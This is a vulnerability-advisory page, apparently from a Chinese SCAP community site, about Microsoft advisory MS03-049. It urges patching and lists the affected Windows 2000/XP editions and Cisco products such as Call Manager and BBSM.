Microsoft has released security advisory MS03-049 to address this issue. Users are strongly advised to obtain fixes, as new attacker vectors greatly increase the speed of an attack on a targeted network.

Cisco has released a security advisory detailing affected Cisco products. See referenced advisory for details concerning obtaining fixes.


Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP2

Cisco Internet Service Node

Microsoft Windows XP Professional

Cisco Conference Connection

Microsoft Windows XP 64-bit Edition SP1

Microsoft Windows 2000 Advanced Server SP4

Cisco Personal Assistant

Microsoft Windows 2000 Professional SP3

Microsoft Windows 2000 Professional SP2

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows XP Home

Cisco Building BroadBand Service Manager Hotspot 1.0

Cisco Call Manager 1.0

Cisco Conference Connection 1.1 (1)

Cisco Conference Connection 1.2

Cisco Personal Assistant 1.3 (4)

Cisco Personal Assistant 1.3 (1)

Cisco Personal Assistant 1.4 (2)

Cisco Personal Assistant 1.4 (1)

Cisco Call Manager 2.0

Cisco IP Call Center Express (IPCC Express) Enhanced 3.0

Cisco IP Call Center Express (IPCC Express) Standard 3.0

Cisco Building Broadband Service Manager (BBSM) 3.0

Cisco Call Manager 3.0

Cisco Call Manager 3.1

Cisco Call Manager 3.1 (3a)

Cisco Call Manager 3.2

Cisco Call Manager 3.3 (3)

Cisco Building Broadband Service Manager (BBSM) 4.0.1

Cisco Building Broadband Service Manager (BBSM) 4.2

Cisco Building Broadband Service Manager (BBSM) 4.4

Cisco Building Broadband Service Manager (BBSM) 4.5

Cisco Building Broadband Service Manager (BBSM) 5.0

Cisco Building Broadband Service Manager (BBSM) 5.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站